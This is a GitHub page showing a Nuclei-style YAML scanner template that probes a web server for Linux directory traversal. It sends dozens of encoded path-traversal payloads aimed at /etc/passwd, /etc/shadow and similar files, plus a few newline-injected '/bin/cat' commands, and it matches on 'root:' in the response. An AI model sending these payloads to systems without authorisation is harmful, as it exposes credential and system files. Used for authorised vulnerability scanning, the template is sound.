-
Notifications
You must be signed in to change notification settings - Fork 24
/
Copy pathdir-traversal.yaml
70 lines (66 loc) · 3.43 KB
/
dir-traversal.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
id: dir-traversal
info:
name: Linux Directory Traversal
author: Sappy
severity: high
description: Detects basic linux based directory traversal.
requests:
- method: GET
path:
- "{{BaseURL}}/..%5cetc/passwd"
- "{{BaseURL}}/..%5c..%5cetc/passwd"
- "{{BaseURL}}/..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/static/..%5cetc/passwd"
- "{{BaseURL}}/static/..%5c..%5cetc/passwd"
- "{{BaseURL}}/static/..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "{{BaseURL}}/./../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/../../../../../../../../../../../../etc/hosts%00"
- "{{BaseURL}}/../../../../../../../../../../../../etc/hosts"
- "{{BaseURL}}/../../boot.ini"
- "{{BaseURL}}/../../../../../../../../%2A"
- "{{BaseURL}}/../../../../../../../../../../../../etc/passwd%00"
- "{{BaseURL}}/../../../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/../../../../../../../../../../../../etc/shadow%00"
- "{{BaseURL}}/../../../../../../../../../../../../etc/shadow"
- "{{BaseURL}}/../../../../../../../../../../etc/passwd^^"
- "{{BaseURL}}/../../../../../../../../../../etc/shadow^^"
- "{{BaseURL}}/../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/../../../../../../../../../../etc/shadow"
- "{{BaseURL}}/./././././././././././etc/passwd"
- "{{BaseURL}}/./././././././././././etc/shadow"
- "{{BaseURL}}/%0a/bin/cat%20/etc/passwd"
- "{{BaseURL}}/%0a/bin/cat%20/etc/shadow"
- "{{BaseURL}}/%00/etc/passwd%00"
- "{{BaseURL}}/%00/etc/shadow%00"
- "{{BaseURL}}/%00../../../../../../etc/passwd"
- "{{BaseURL}}/%00../../../../../../etc/shadow"
- "{{BaseURL}}/../../../../../../../../../../../etc/passwd%00.jpg"
- "{{BaseURL}}/../../../../../../../../../../../etc/passwd%00.html"
- "{{BaseURL}}/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd"
- "{{BaseURL}}/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow"
- "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
- "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow"
- "{{BaseURL}}%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00"
- "{{BaseURL}}//%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00"
- "{{BaseURL}}/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00"
- "{{BaseURL}}//'/bin/cat%20/etc/passwd//'"
- "{{BaseURL}}/image?filename=../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "root:"
- "localhost"
condition: or
part: body